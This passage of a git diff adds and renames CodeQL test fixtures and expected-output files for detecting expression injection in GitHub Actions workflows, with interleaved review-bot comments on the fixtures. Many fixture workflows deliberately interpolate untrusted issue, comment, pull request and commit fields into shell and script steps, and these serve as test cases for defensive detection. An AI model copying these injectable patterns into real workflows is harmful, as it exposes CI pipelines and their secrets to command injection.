+| .github/workflows/reusable_workflow.yml:6:7:6:17 | input config-path | semmle.label | input config-path |
+| .github/workflows/reusable_workflow.yml:11:16:11:51 | ${{ job ... put1 }} | semmle.label | ${{ job ... put1 }} |
+| .github/workflows/reusable_workflow.yml:22:7:24:4 | job-out ... utput}} [job-output1] | semmle.label | job-out ... utput}} [job-output1] |
+| .github/workflows/reusable_workflow.yml:22:20:22:56 | ${{ ste ... utput}} | semmle.label | ${{ ste ... utput}} |
+| .github/workflows/reusable_workflow.yml:25:9:31:6 | id: step1 [step-output] | semmle.label | id: step1 [step-output] |
+| .github/workflows/reusable_workflow.yml:27:24:27:48 | ${{ inp ... path }} | semmle.label | ${{ inp ... path }} |
+subpaths
+#select
+| .github/workflows/reusable_workflow.yml:11:16:11:51 | ${{ job ... put1 }} | .github/workflows/reusable_workflow.yml:6:7:6:17 | input config-path | .github/workflows/reusable_workflow.yml:11:16:11:51 | ${{ job ... put1 }} | Summary |
diff --git a/ql/test/query-tests/Security/CWE-020/ReusableWorkflowsSummaries.qlref b/ql/test/query-tests/Security/CWE-020/ReusableWorkflowsSummaries.qlref
new file mode 100644
index 00000000000..ff87d53c3d6
--- /dev/null
+++ b/ql/test/query-tests/Security/CWE-020/ReusableWorkflowsSummaries.qlref
@@ -0,0 +1,2 @@
+Security/CWE-020/ReusableWorkflowsSummaries.ql
+
diff --git a/ql/src/test/composite-actions/action.yml b/ql/test/query-tests/Security/CWE-020/action1/action.yml
similarity index 99%
rename from ql/src/test/composite-actions/action.yml
rename to ql/test/query-tests/Security/CWE-020/action1/action.yml
index c43d5fd6694..787fb9f588b 100644
--- a/ql/src/test/composite-actions/action.yml
+++ b/ql/test/query-tests/Security/CWE-020/action1/action.yml
@@ -48,3 +48,4 @@ runs: TAINTED: ${{ steps.changed-files.outputs.all_changed_files }} +
diff --git a/ql/src/test/.github/workflows/argus_case_study.yml b/ql/test/query-tests/Security/CWE-094/.github/workflows/argus_case_study.yml
similarity index 100%
rename from ql/src/test/.github/workflows/argus_case_study.yml
rename to ql/test/query-tests/Security/CWE-094/.github/workflows/argus_case_study.yml
diff --git a/ql/src/test/.github/workflows/changed-files.yml b/ql/test/query-tests/Security/CWE-094/.github/workflows/changed-files.yml
similarity index 100%
rename from ql/src/test/.github/workflows/changed-files.yml
rename to ql/test/query-tests/Security/CWE-094/.github/workflows/changed-files.yml
diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/comment_issue.yml b/ql/test/query-tests/Security/CWE-094/.github/workflows/comment_issue.yml
new file mode 100644
index 00000000000..17ead9fdd20
--- /dev/null
+++ b/ql/test/query-tests/Security/CWE-094/.github/workflows/comment_issue.yml
@@ -0,0 +1,28 @@
+on: issue_comment
+
+jobs:
+ echo-chamber:
+ runs-on: ubuntu-latest
+ steps:
+ - run: |
+ echo '${{ github.event.comment.body }}'
+
+ echo-chamber2:
+ runs-on: ubuntu-latest
+ steps:
+ - run: echo '${{ github.event.comment.body }}'
+ - run: echo '${{ github.event.issue.body }}'
+ - run: echo '${{ github.event.issue.title }}'
+
+ echo-chamber3:
+ runs-on: ubuntu-latest
+ steps:
+ - uses: actions/github-script@v3
+ with:
+ script: console.log('${{ github.event.comment.body }}')
+ - uses: actions/github-script@v3
+ with:
+ script: console.log('${{ github.event.issue.body }}')
+ - uses: actions/github-script@v3
+ with:
+ script: console.log('${{ github.event.issue.title }}')
\ No newline at end of file
diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/comment_issue_newline.yml b/ql/test/query-tests/Security/CWE-094/.github/workflows/comment_issue_newline.yml
new file mode 100644
index 00000000000..0a64e47f6cb
--- /dev/null
+++ b/ql/test/query-tests/Security/CWE-094/.github/workflows/comment_issue_newline.yml
@@ -0,0 +1,10 @@
+on: issue_comment
+
+# same as comment_issue but this file ends with a line break
+
+jobs:
+ echo-chamber:
+ runs-on: ubuntu-latest
+ steps:
+ - run: |
+ echo '${{ github.event.comment.body }}'
diff --git a/ql/src/test/.github/workflows/cross1.yml b/ql/test/query-tests/Security/CWE-094/.github/workflows/cross1.yml
similarity index 100%
rename from ql/src/test/.github/workflows/cross1.yml
rename to ql/test/query-tests/Security/CWE-094/.github/workflows/cross1.yml
diff --git a/ql/src/test/.github/workflows/cross2.yml b/ql/test/query-tests/Security/CWE-094/.github/workflows/cross2.yml
similarity index 100%
rename from ql/src/test/.github/workflows/cross2.yml
rename to ql/test/query-tests/Security/CWE-094/.github/workflows/cross2.yml
diff --git a/ql/src/test/.github/workflows/cross3.yml b/ql/test/query-tests/Security/CWE-094/.github/workflows/cross3.yml
similarity index 100%
rename from ql/src/test/.github/workflows/cross3.yml
rename to ql/test/query-tests/Security/CWE-094/.github/workflows/cross3.yml
diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/discussion.yml b/ql/test/query-tests/Security/CWE-094/.github/workflows/discussion.yml
new file mode 100644
index 00000000000..fdb140ec380
--- /dev/null
+++ b/ql/test/query-tests/Security/CWE-094/.github/workflows/discussion.yml
@@ -0,0 +1,8 @@
+on: discussion
+
+jobs:
+ echo-chamber:
+ runs-on: ubuntu-latest
+ steps:
+ - run: echo '${{ github.event.discussion.title }}'
+ - run: echo '${{ github.event.discussion.body }}'
\ No newline at end of file
diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/discussion_comment.yml b/ql/test/query-tests/Security/CWE-094/.github/workflows/discussion_comment.yml
new file mode 100644
index 00000000000..649d3a6e131
--- /dev/null
+++ b/ql/test/query-tests/Security/CWE-094/.github/workflows/discussion_comment.yml
@@ -0,0 +1,9 @@
+on: discussion_comment
+
+jobs:
+ echo-chamber:
+ runs-on: ubuntu-latest
+ steps:
+ - run: echo '${{ github.event.discussion.title }}'
+ - run: echo '${{ github.event.discussion.body }}'
+ - run: echo '${{ github.event.comment.body }}'
\ No newline at end of file
diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/gollum.yml b/ql/test/query-tests/Security/CWE-094/.github/workflows/gollum.yml
new file mode 100644
index 00000000000..a952c8c1ab8
--- /dev/null
+++ b/ql/test/query-tests/Security/CWE-094/.github/workflows/gollum.yml
@@ -0,0 +1,11 @@
+on: gollum
+
+jobs:
+ echo-chamber:
+ runs-on: ubuntu-latest
+ steps:
+ - run: echo '${{ github.event.pages[1].title }}'
+ - run: echo '${{ github.event.pages[11].title }}'
+ - run: echo '${{ github.event.pages[0].page_name }}'
+ - run: echo '${{ github.event.pages[2222].page_name }}'
+ - run: echo '${{ toJSON(github.event.pages.*.title) }}' # safe
\ No newline at end of file
diff --git a/ql/src/test/.github/workflows/image_link_generator.yml b/ql/test/query-tests/Security/CWE-094/.github/workflows/image_link_generator.yml
similarity index 100%
rename from ql/src/test/.github/workflows/image_link_generator.yml
rename to ql/test/query-tests/Security/CWE-094/.github/workflows/image_link_generator.yml
diff --git a/ql/src/test/.github/workflows/inter-job.yml b/ql/test/query-tests/Security/CWE-094/.github/workflows/inter-job.yml
similarity index 100%
rename from ql/src/test/.github/workflows/inter-job.yml
rename to ql/test/query-tests/Security/CWE-094/.github/workflows/inter-job.yml
diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/issues.yaml b/ql/test/query-tests/Security/CWE-094/.github/workflows/issues.yaml
new file mode 100644
index 00000000000..5e767ce0239
--- /dev/null
+++ b/ql/test/query-tests/Security/CWE-094/.github/workflows/issues.yaml
@@ -0,0 +1,20 @@
+on: issues
+
+env:
+ global_env: ${{ github.event.issue.title }}
+ test: test
+
+jobs:
+ echo-chamber:
+ env:
+ job_env: ${{ github.event.issue.title }}
+ runs-on: ubuntu-latest
+ steps:
+ - run: echo '${{ github.event.issue.title }}'
+ - run: echo '${{ github.event.issue.body }}'
+ - run: echo '${{ env.global_env }}'
+ - run: echo '${{ env.test }}'
+ - run: echo '${{ env.job_env }}'
+ - run: echo '${{ env.step_env }}'
+ env:
+ step_env: ${{ github.event.issue.title }}
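Review bot: The `- run: echo '${{ env.test }}'` step in issues.yaml is the only negative case in the file (`test: test` is a constant), but nothing marks it as such, whereas gollum.yml in the same commit annotates its negative case with `# safe`. Add the same marker, `- run: echo '${{ env.test }}' # safe`, so a reader comparing the fixture with the expected output knows that the missing row for line 16 is intended. A short header comment saying that the file exercises workflow-level, job-level and step-level `env` propagation of `github.event.issue.title` would also make the three expected edges easier to follow.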
diff --git a/ql/src/test/.github/workflows/matrix.yml b/ql/test/query-tests/Security/CWE-094/.github/workflows/matrix.yml
similarity index 100%
rename from ql/src/test/.github/workflows/matrix.yml
rename to ql/test/query-tests/Security/CWE-094/.github/workflows/matrix.yml
diff --git a/ql/src/test/.github/workflows/no-flow1.yml b/ql/test/query-tests/Security/CWE-094/.github/workflows/no-flow1.yml
similarity index 100%
rename from ql/src/test/.github/workflows/no-flow1.yml
rename to ql/test/query-tests/Security/CWE-094/.github/workflows/no-flow1.yml
diff --git a/ql/src/test/.github/workflows/no-flow2.yml b/ql/test/query-tests/Security/CWE-094/.github/workflows/no-flow2.yml
similarity index 100%
rename from ql/src/test/.github/workflows/no-flow2.yml
rename to ql/test/query-tests/Security/CWE-094/.github/workflows/no-flow2.yml
diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/pull_request_review.yml b/ql/test/query-tests/Security/CWE-094/.github/workflows/pull_request_review.yml
new file mode 100644
index 00000000000..d4ce7885669
--- /dev/null
+++ b/ql/test/query-tests/Security/CWE-094/.github/workflows/pull_request_review.yml
@@ -0,0 +1,14 @@
+on: pull_request_review
+
+jobs:
+ echo-chamber:
+ runs-on: ubuntu-latest
+ steps:
+ - run: echo '${{ github.event.pull_request.title }}'
+ - run: echo '${{ github.event.pull_request.body }}'
+ - run: echo '${{ github.event.pull_request.head.label }}'
+ - run: echo '${{ github.event.pull_request.head.repo.default_branch }}'
+ - run: echo '${{ github.event.pull_request.head.repo.description }}'
+ - run: echo '${{ github.event.pull_request.head.repo.homepage }}'
+ - run: echo '${{ github.event.pull_request.head.ref }}'
+ - run: echo '${{ github.event.review.body }}'
diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/pull_request_review_comment.yml b/ql/test/query-tests/Security/CWE-094/.github/workflows/pull_request_review_comment.yml
new file mode 100644
index 00000000000..5d288caad85
--- /dev/null
+++ b/ql/test/query-tests/Security/CWE-094/.github/workflows/pull_request_review_comment.yml
@@ -0,0 +1,14 @@
+on: pull_request_review_comment
+
+jobs:
+ echo-chamber:
+ runs-on: ubuntu-latest
+ steps:
+ - run: echo '${{ github.event.pull_request.title }}'
+ - run: echo '${{ github.event.pull_request.body }}'
+ - run: echo '${{ github.event.pull_request.head.label }}'
+ - run: echo '${{ github.event.pull_request.head.repo.default_branch }}'
+ - run: echo '${{ github.event.pull_request.head.repo.description }}'
+ - run: echo '${{ github.event.pull_request.head.repo.homepage }}'
+ - run: echo '${{ github.event.pull_request.head.ref }}'
+ - run: echo '${{ github.event.comment.body }}'
diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/pull_request_target.yml b/ql/test/query-tests/Security/CWE-094/.github/workflows/pull_request_target.yml
new file mode 100644
index 00000000000..215b3252885
--- /dev/null
+++ b/ql/test/query-tests/Security/CWE-094/.github/workflows/pull_request_target.yml
@@ -0,0 +1,16 @@
+on: pull_request_target
+
+jobs:
+ echo-chamber:
+ runs-on: ubuntu-latest
+ steps:
+ - run: echo '${{ github.event.issue.title }}' # not defined
+ - run: echo '${{ github.event.issue.body }}' # not defined
+ - run: echo '${{ github.event.pull_request.title }}'
+ - run: echo '${{ github.event.pull_request.body }}'
+ - run: echo '${{ github.event.pull_request.head.label }}'
+ - run: echo '${{ github.event.pull_request.head.repo.default_branch }}'
+ - run: echo '${{ github.event.pull_request.head.repo.description }}'
+ - run: echo '${{ github.event.pull_request.head.repo.homepage }}'
+ - run: echo '${{ github.event.pull_request.head.ref }}'
+ - run: echo '${{ github.head_ref }}'
diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/push.yml b/ql/test/query-tests/Security/CWE-094/.github/workflows/push.yml
new file mode 100644
index 00000000000..2006a7999da
--- /dev/null
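Review bot: The two steps commented `# not defined` in pull_request_target.yml (`github.event.issue.title` and `github.event.issue.body`, new-file lines 7 and 8) are still listed in the `nodes` section of the expected output added by this commit, as `pull_request_target.yml:7:12:7:49` and `pull_request_target.yml:8:12:8:48`. That suggests the query does not take the `on:` trigger into account when deciding which context fields are attacker-controlled. The `#select` rows for this file are outside the visible part of the patch, so whether they are reported as alerts cannot be confirmed here. If they are, the baseline encodes two false positives: either restrict sources to the fields the triggering event can populate, or reword the comments to something like `# not defined for pull_request_target; currently reported` so the fixture and the baseline agree.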
+++ b/ql/test/query-tests/Security/CWE-094/.github/workflows/push.yml
@@ -0,0 +1,16 @@
+on: push
+
+jobs:
+ echo-chamber:
+ runs-on: ubuntu-latest
+ steps:
+ - run: echo '${{ github.event.commits[11].message }}'
+ - run: echo '${{ github.event.commits[11].author.email }}'
+ - run: echo '${{ github.event.commits[11].author.name }}'
+ - run: echo '${{ github.event.head_commit.message }}'
+ - run: echo '${{ github.event.head_commit.author.email }}'
+ - run: echo '${{ github.event.head_commit.author.name }}'
+ - run: echo '${{ github.event.head_commit.committer.email }}'
+ - run: echo '${{ github.event.head_commit.committer.name }}'
+ - run: echo '${{ github.event.commits[11].committer.email }}'
+ - run: echo '${{ github.event.commits[11].committer.name }}'
\ No newline at end of file
diff --git a/ql/src/test/.github/workflows/simple1.yml b/ql/test/query-tests/Security/CWE-094/.github/workflows/simple1.yml
similarity index 100%
rename from ql/src/test/.github/workflows/simple1.yml
rename to ql/test/query-tests/Security/CWE-094/.github/workflows/simple1.yml
diff --git a/ql/src/test/.github/workflows/simple2.yml b/ql/test/query-tests/Security/CWE-094/.github/workflows/simple2.yml
similarity index 100%
rename from ql/src/test/.github/workflows/simple2.yml
rename to ql/test/query-tests/Security/CWE-094/.github/workflows/simple2.yml
diff --git a/ql/src/test/.github/workflows/test.yml b/ql/test/query-tests/Security/CWE-094/.github/workflows/test.yml
similarity index 100%
rename from ql/src/test/.github/workflows/test.yml
rename to ql/test/query-tests/Security/CWE-094/.github/workflows/test.yml
diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/workflow_run.yml b/ql/test/query-tests/Security/CWE-094/.github/workflows/workflow_run.yml
new file mode 100644
index 00000000000..60e7645f60f
--- /dev/null
+++ b/ql/test/query-tests/Security/CWE-094/.github/workflows/workflow_run.yml
@@ -0,0 +1,16 @@
+on:
+ workflow_run:
+ workflows: [test]
+
+jobs:
+ echo-chamber:
+ runs-on: ubuntu-latest
+ steps:
+ - run: echo '${{ github.event.workflow_run.display_title }}'
+ - run: echo '${{ github.event.workflow_run.head_commit.message }}'
+ - run: echo '${{ github.event.workflow_run.head_commit.author.email }}'
+ - run: echo '${{ github.event.workflow_run.head_commit.author.name }}'
+ - run: echo '${{ github.event.workflow_run.head_commit.committer.email }}'
+ - run: echo '${{ github.event.workflow_run.head_commit.committer.name }}'
+ - run: echo '${{ github.event.workflow_run.head_branch }}'
+ - run: echo '${{ github.event.workflow_run.head_repository.description }}'
diff --git a/ql/test/query-tests/Security/CWE-094/CriticalExpressionInjection.expected b/ql/test/query-tests/Security/CWE-094/CriticalExpressionInjection.expected
new file mode 100644
index 00000000000..55075b7baf3
--- /dev/null
+++ b/ql/test/query-tests/Security/CWE-094/CriticalExpressionInjection.expected
@@ -0,0 +1,227 @@ +edges +| .github/workflows/argus_case_study.yml:15:9:24:6 | name: R ... g chars [replaced] | .github/workflows/argus_case_study.yml:26:14:27:95 | \| | +| .github/workflows/argus_case_study.yml:17:24:17:52 | ${{gith ... title}} | .github/workflows/argus_case_study.yml:22:19:22:38 | ${{env.ISSUE_TITLE}} | +| .github/workflows/argus_case_study.yml:22:19:22:38 | ${{env.ISSUE_TITLE}} | .github/workflows/argus_case_study.yml:15:9:24:6 | name: R ... g chars [replaced] | +| .github/workflows/changed-files.yml:16:9:20:6 | name: G ... d files | .github/workflows/changed-files.yml:21:14:24:15 | \| | +| .github/workflows/cross3.yml:27:7:37:4 | name: R ... g chars [replaced] | .github/workflows/cross3.yml:39:30:39:74 | ${{step ... laced}} | +| .github/workflows/cross3.yml:27:7:37:4 | name: R ... g chars [replaced] | .github/workflows/cross3.yml:57:28:57:72 | ${{step ... laced}} | +| .github/workflows/cross3.yml:32:17:32:52 | ${{gith ... ssage}} | .github/workflows/cross3.yml:27:7:37:4 | name: R ... g chars [replaced] | +| .github/workflows/cross3.yml:39:30:39:74 | ${{step ... laced}} | .github/workflows/cross3.yml:41:12:43:5 | \| | +| .github/workflows/cross3.yml:57:28:57:72 | ${{step ... laced}} | .github/workflows/cross3.yml:61:21:68:47 | \| | +| .github/workflows/cross3.yml:61:21:68:47 | \| | .github/workflows/cross3.yml:47:12:53:109 | \| | +| .github/workflows/image_link_generator.yml:15:9:22:6 | name: E ... ial URL [initial_url] | .github/workflows/image_link_generator.yml:25:24:25:67 | ${{ ste ... _url }} | +| .github/workflows/image_link_generator.yml:18:17:18:48 | ${{ git ... body }} | .github/workflows/image_link_generator.yml:15:9:22:6 | name: E ... ial URL [initial_url] | +| .github/workflows/image_link_generator.yml:22:9:28:6 | name: G ... bugging [redirected_url] | .github/workflows/image_link_generator.yml:31:27:31:66 | ${{ ste ... _url }} | +| .github/workflows/image_link_generator.yml:25:24:25:67 | ${{ ste ... 
_url }} | .github/workflows/image_link_generator.yml:22:9:28:6 | name: G ... bugging [redirected_url] | +| .github/workflows/image_link_generator.yml:28:9:35:6 | name: T ... ter PNG [trimmed_url] | .github/workflows/image_link_generator.yml:36:14:37:126 | \| | +| .github/workflows/image_link_generator.yml:31:27:31:66 | ${{ ste ... _url }} | .github/workflows/image_link_generator.yml:28:9:35:6 | name: T ... ter PNG [trimmed_url] | +| .github/workflows/inter-job.yml:8:7:10:4 | job_out ... alue }} [job_output] | .github/workflows/inter-job.yml:36:14:36:52 | echo ${ ... utput}} | +| .github/workflows/inter-job.yml:8:19:8:49 | ${{ ste ... alue }} | .github/workflows/inter-job.yml:8:7:10:4 | job_out ... alue }} [job_output] | +| .github/workflows/inter-job.yml:15:9:19:6 | name: G ... d files | .github/workflows/inter-job.yml:23:19:23:63 | ${{ ste ... iles }} | +| .github/workflows/inter-job.yml:19:9:27:2 | name: R ... d files [value] | .github/workflows/inter-job.yml:8:19:8:49 | ${{ ste ... alue }} | +| .github/workflows/inter-job.yml:23:19:23:63 | ${{ ste ... iles }} | .github/workflows/inter-job.yml:19:9:27:2 | name: R ... d files [value] | +| .github/workflows/issues.yaml:4:15:4:45 | ${{ git ... itle }} | .github/workflows/issues.yaml:15:12:15:39 | echo '$ ... env }}' | +| .github/workflows/issues.yaml:10:16:10:46 | ${{ git ... itle }} | .github/workflows/issues.yaml:17:12:17:36 | echo '$ ... env }}' | +| .github/workflows/issues.yaml:20:19:20:49 | ${{ git ... itle }} | .github/workflows/issues.yaml:18:12:18:37 | echo '$ ... env }}' | +| .github/workflows/matrix.yml:15:7:16:4 | matrix: ... iles }} [matrix] | .github/workflows/matrix.yml:34:19:34:69 | ${{ fro ... rix) }} | +| .github/workflows/matrix.yml:15:15:15:63 | ${{ ste ... iles }} | .github/workflows/matrix.yml:15:7:16:4 | matrix: ... iles }} [matrix] | +| .github/workflows/matrix.yml:17:9:21:2 | name: G ... d files | .github/workflows/matrix.yml:15:15:15:63 | ${{ ste ... 
iles }} | +| .github/workflows/matrix.yml:34:19:34:69 | ${{ fro ... rix) }} | .github/workflows/matrix.yml:41:12:42:31 | \| | +| .github/workflows/simple1.yml:8:9:14:6 | id: summary [value] | .github/workflows/simple1.yml:15:14:16:50 | \| | +| .github/workflows/simple1.yml:11:19:11:57 | ${{ git ... sage }} | .github/workflows/simple1.yml:8:9:14:6 | id: summary [value] | +| .github/workflows/simple2.yml:14:9:18:6 | name: G ... d files | .github/workflows/simple2.yml:22:19:22:63 | ${{ ste ... iles }} | +| .github/workflows/simple2.yml:18:9:26:6 | name: R ... d files [value] | .github/workflows/simple2.yml:28:14:31:15 | \| | +| .github/workflows/simple2.yml:22:19:22:63 | ${{ ste ... iles }} | .github/workflows/simple2.yml:18:9:26:6 | name: R ... d files [value] | +| .github/workflows/test.yml:8:7:10:4 | job_out ... test }} [job_output] | .github/workflows/test.yml:37:14:37:52 | echo ${ ... utput}} | +| .github/workflows/test.yml:8:19:8:49 | ${{ ste ... test }} | .github/workflows/test.yml:8:7:10:4 | job_out ... test }} [job_output] | +| .github/workflows/test.yml:12:9:18:6 | id: step0 [value] | .github/workflows/test.yml:20:17:20:47 | ${{ ste ... value}} | +| .github/workflows/test.yml:15:19:15:57 | ${{ git ... sage }} | .github/workflows/test.yml:12:9:18:6 | id: step0 [value] | +| .github/workflows/test.yml:18:9:24:6 | id: step1 [MSG] | .github/workflows/test.yml:26:18:26:45 | ${{step ... s.MSG}} | +| .github/workflows/test.yml:20:17:20:47 | ${{ ste ... value}} | .github/workflows/test.yml:18:9:24:6 | id: step1 [MSG] | +| .github/workflows/test.yml:24:9:29:2 | id: step2 [test] | .github/workflows/test.yml:8:19:8:49 | ${{ ste ... test }} | +| .github/workflows/test.yml:26:18:26:45 | ${{step ... s.MSG}} | .github/workflows/test.yml:24:9:29:2 | id: step2 [test] | +nodes +| .github/workflows/argus_case_study.yml:15:9:24:6 | name: R ... g chars [replaced] | semmle.label | name: R ... g chars [replaced] | +| .github/workflows/argus_case_study.yml:17:24:17:52 | ${{gith ... 
title}} | semmle.label | ${{gith ... title}} | +| .github/workflows/argus_case_study.yml:22:19:22:38 | ${{env.ISSUE_TITLE}} | semmle.label | ${{env.ISSUE_TITLE}} | +| .github/workflows/argus_case_study.yml:26:14:27:95 | \| | semmle.label | \| | +| .github/workflows/changed-files.yml:16:9:20:6 | name: G ... d files | semmle.label | name: G ... d files | +| .github/workflows/changed-files.yml:21:14:24:15 | \| | semmle.label | \| | +| .github/workflows/comment_issue.yml:7:12:8:48 | \| | semmle.label | \| | +| .github/workflows/comment_issue.yml:13:12:13:50 | echo '$ ... ody }}' | semmle.label | echo '$ ... ody }}' | +| .github/workflows/comment_issue.yml:14:12:14:48 | echo '$ ... ody }}' | semmle.label | echo '$ ... ody }}' | +| .github/workflows/comment_issue.yml:15:12:15:49 | echo '$ ... tle }}' | semmle.label | echo '$ ... tle }}' | +| .github/workflows/comment_issue_newline.yml:9:14:10:50 | \| | semmle.label | \| | +| .github/workflows/cross3.yml:27:7:37:4 | name: R ... g chars [replaced] | semmle.label | name: R ... g chars [replaced] | +| .github/workflows/cross3.yml:32:17:32:52 | ${{gith ... ssage}} | semmle.label | ${{gith ... ssage}} | +| .github/workflows/cross3.yml:39:30:39:74 | ${{step ... laced}} | semmle.label | ${{step ... laced}} | +| .github/workflows/cross3.yml:41:12:43:5 | \| | semmle.label | \| | +| .github/workflows/cross3.yml:47:12:53:109 | \| | semmle.label | \| | +| .github/workflows/cross3.yml:57:28:57:72 | ${{step ... laced}} | semmle.label | ${{step ... laced}} | +| .github/workflows/cross3.yml:61:21:68:47 | \| | semmle.label | \| | +| .github/workflows/discussion.yml:7:12:7:54 | echo '$ ... tle }}' | semmle.label | echo '$ ... tle }}' | +| .github/workflows/discussion.yml:8:12:8:53 | echo '$ ... ody }}' | semmle.label | echo '$ ... ody }}' | +| .github/workflows/discussion_comment.yml:7:12:7:54 | echo '$ ... tle }}' | semmle.label | echo '$ ... tle }}' | +| .github/workflows/discussion_comment.yml:8:12:8:53 | echo '$ ... 
ody }}' | semmle.label | echo '$ ... ody }}' | +| .github/workflows/discussion_comment.yml:9:12:9:50 | echo '$ ... ody }}' | semmle.label | echo '$ ... ody }}' | +| .github/workflows/gollum.yml:7:12:7:52 | echo '$ ... tle }}' | semmle.label | echo '$ ... tle }}' | +| .github/workflows/gollum.yml:8:12:8:53 | echo '$ ... tle }}' | semmle.label | echo '$ ... tle }}' | +| .github/workflows/gollum.yml:9:12:9:56 | echo '$ ... ame }}' | semmle.label | echo '$ ... ame }}' | +| .github/workflows/gollum.yml:10:12:10:59 | echo '$ ... ame }}' | semmle.label | echo '$ ... ame }}' | +| .github/workflows/image_link_generator.yml:15:9:22:6 | name: E ... ial URL [initial_url] | semmle.label | name: E ... ial URL [initial_url] | +| .github/workflows/image_link_generator.yml:18:17:18:48 | ${{ git ... body }} | semmle.label | ${{ git ... body }} | +| .github/workflows/image_link_generator.yml:22:9:28:6 | name: G ... bugging [redirected_url] | semmle.label | name: G ... bugging [redirected_url] | +| .github/workflows/image_link_generator.yml:25:24:25:67 | ${{ ste ... _url }} | semmle.label | ${{ ste ... _url }} | +| .github/workflows/image_link_generator.yml:28:9:35:6 | name: T ... ter PNG [trimmed_url] | semmle.label | name: T ... ter PNG [trimmed_url] | +| .github/workflows/image_link_generator.yml:31:27:31:66 | ${{ ste ... _url }} | semmle.label | ${{ ste ... _url }} | +| .github/workflows/image_link_generator.yml:36:14:37:126 | \| | semmle.label | \| | +| .github/workflows/inter-job.yml:8:7:10:4 | job_out ... alue }} [job_output] | semmle.label | job_out ... alue }} [job_output] | +| .github/workflows/inter-job.yml:8:19:8:49 | ${{ ste ... alue }} | semmle.label | ${{ ste ... alue }} | +| .github/workflows/inter-job.yml:15:9:19:6 | name: G ... d files | semmle.label | name: G ... d files | +| .github/workflows/inter-job.yml:19:9:27:2 | name: R ... d files [value] | semmle.label | name: R ... d files [value] | +| .github/workflows/inter-job.yml:23:19:23:63 | ${{ ste ... 
iles }} | semmle.label | ${{ ste ... iles }} | +| .github/workflows/inter-job.yml:36:14:36:52 | echo ${ ... utput}} | semmle.label | echo ${ ... utput}} | +| .github/workflows/issues.yaml:4:15:4:45 | ${{ git ... itle }} | semmle.label | ${{ git ... itle }} | +| .github/workflows/issues.yaml:10:16:10:46 | ${{ git ... itle }} | semmle.label | ${{ git ... itle }} | +| .github/workflows/issues.yaml:13:12:13:49 | echo '$ ... tle }}' | semmle.label | echo '$ ... tle }}' | +| .github/workflows/issues.yaml:14:12:14:48 | echo '$ ... ody }}' | semmle.label | echo '$ ... ody }}' | +| .github/workflows/issues.yaml:15:12:15:39 | echo '$ ... env }}' | semmle.label | echo '$ ... env }}' | +| .github/workflows/issues.yaml:17:12:17:36 | echo '$ ... env }}' | semmle.label | echo '$ ... env }}' | +| .github/workflows/issues.yaml:18:12:18:37 | echo '$ ... env }}' | semmle.label | echo '$ ... env }}' | +| .github/workflows/issues.yaml:20:19:20:49 | ${{ git ... itle }} | semmle.label | ${{ git ... itle }} | +| .github/workflows/matrix.yml:15:7:16:4 | matrix: ... iles }} [matrix] | semmle.label | matrix: ... iles }} [matrix] | +| .github/workflows/matrix.yml:15:15:15:63 | ${{ ste ... iles }} | semmle.label | ${{ ste ... iles }} | +| .github/workflows/matrix.yml:17:9:21:2 | name: G ... d files | semmle.label | name: G ... d files | +| .github/workflows/matrix.yml:34:19:34:69 | ${{ fro ... rix) }} | semmle.label | ${{ fro ... rix) }} | +| .github/workflows/matrix.yml:41:12:42:31 | \| | semmle.label | \| | +| .github/workflows/pull_request_review.yml:7:12:7:56 | echo '$ ... tle }}' | semmle.label | echo '$ ... tle }}' | +| .github/workflows/pull_request_review.yml:8:12:8:55 | echo '$ ... ody }}' | semmle.label | echo '$ ... ody }}' | +| .github/workflows/pull_request_review.yml:9:12:9:61 | echo '$ ... bel }}' | semmle.label | echo '$ ... bel }}' | +| .github/workflows/pull_request_review.yml:10:12:10:75 | echo '$ ... nch }}' | semmle.label | echo '$ ... 
nch }}' | +| .github/workflows/pull_request_review.yml:11:12:11:72 | echo '$ ... ion }}' | semmle.label | echo '$ ... ion }}' | +| .github/workflows/pull_request_review.yml:12:12:12:69 | echo '$ ... age }}' | semmle.label | echo '$ ... age }}' | +| .github/workflows/pull_request_review.yml:13:12:13:59 | echo '$ ... ref }}' | semmle.label | echo '$ ... ref }}' | +| .github/workflows/pull_request_review.yml:14:12:14:49 | echo '$ ... ody }}' | semmle.label | echo '$ ... ody }}' | +| .github/workflows/pull_request_review_comment.yml:7:12:7:56 | echo '$ ... tle }}' | semmle.label | echo '$ ... tle }}' | +| .github/workflows/pull_request_review_comment.yml:8:12:8:55 | echo '$ ... ody }}' | semmle.label | echo '$ ... ody }}' | +| .github/workflows/pull_request_review_comment.yml:9:12:9:61 | echo '$ ... bel }}' | semmle.label | echo '$ ... bel }}' | +| .github/workflows/pull_request_review_comment.yml:10:12:10:75 | echo '$ ... nch }}' | semmle.label | echo '$ ... nch }}' | +| .github/workflows/pull_request_review_comment.yml:11:12:11:72 | echo '$ ... ion }}' | semmle.label | echo '$ ... ion }}' | +| .github/workflows/pull_request_review_comment.yml:12:12:12:69 | echo '$ ... age }}' | semmle.label | echo '$ ... age }}' | +| .github/workflows/pull_request_review_comment.yml:13:12:13:59 | echo '$ ... ref }}' | semmle.label | echo '$ ... ref }}' | +| .github/workflows/pull_request_review_comment.yml:14:12:14:50 | echo '$ ... ody }}' | semmle.label | echo '$ ... ody }}' | +| .github/workflows/pull_request_target.yml:7:12:7:49 | echo '$ ... tle }}' | semmle.label | echo '$ ... tle }}' | +| .github/workflows/pull_request_target.yml:8:12:8:48 | echo '$ ... ody }}' | semmle.label | echo '$ ... ody }}' | +| .github/workflows/pull_request_target.yml:9:12:9:56 | echo '$ ... tle }}' | semmle.label | echo '$ ... tle }}' | +| .github/workflows/pull_request_target.yml:10:12:10:55 | echo '$ ... ody }}' | semmle.label | echo '$ ... 
